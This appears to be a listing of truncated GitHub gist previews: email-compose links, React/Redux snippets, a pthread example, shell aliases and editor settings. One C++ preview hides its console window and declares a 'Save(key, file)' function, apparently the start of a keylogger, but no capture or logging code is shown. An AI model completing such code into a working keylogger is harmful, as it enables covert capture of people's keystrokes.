Link - https://outlook.live.com/mail/0/deeplink/[email protected]&subject=Hello%20World
Link - https://mail.google.com/mail/?view=cm&fs=1&[email protected]&su=SUBJECT&body=BODY&[email protected]
#include <iostream> | |
#include <windows.h> | |
using namespace std; | |
int Save(int _key,char *file); | |
int main() | |
{ | |
FreeConsole(); |
import * as Actions from './../../../constants/actionTypes'; | |
const initialState = { | |
pages: [], | |
}; | |
const pageReducer = (state = initialState, action) => { | |
switch (action.type) { | |
// New page open | |
case Actions.ADD_PAGE: { |
import { useRef, useEffect } from "react"; | |
const useNonInitialEffect = (effect, deps = []) => { | |
const initialRender = useRef(true); | |
useEffect(() => { | |
let effectReturns = () => {}; | |
if (initialRender.current) { | |
initialRender.current = false; |
import React from "react"; | |
import { connect } from "react-redux"; | |
import { loadMoreChatrooms } from "actions"; | |
import AllChatrooms from "./AllChatrooms"; | |
const Profile = ({ chatrooms, loadMoreChatrooms }) => { | |
return ( | |
<div> | |
<AllChatrooms chatrooms={chatrooms} /> |
console.log(JSON.stringify({ filter }, null, 4)); | |
const start = new Date().getTime(); | |
const end = new Date().getTime(); | |
const time = end - start; | |
console.log({ | |
inLength: filteredChatrooms.length, | |
filterTime: time, |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <unistd.h> //Header file for sleep(). man 3 sleep for details. | |
#include <pthread.h> | |
// A normal C function that is executed as a thread | |
// when its name is specified in pthread_create() | |
void *myThreadFun(void *vargp) | |
{ | |
sleep(4); |
-='cd -' | |
...=../.. | |
....=../../.. | |
.....=../../../.. | |
......=../../../../.. | |
1='cd -' | |
2='cd -2' | |
3='cd -3' | |
4='cd -4' | |
5='cd -5' |
{ | |
"eslint.options": { | |
"rules": { | |
"prettier/prettier": [ | |
"error", | |
{ | |
"endOfLine": "auto" | |
} | |
] | |
} |
// Mobile: React Native | |
import React, {useState, useEffect} from 'react'; | |
import { View } from 'react-native'; | |
import {Button} from 'react-native-paper'; | |
import { WebView } from 'react-native-webview'; | |
const App = () => { | |
const [show, setShow] = useState({isOpen: false, url: null}); |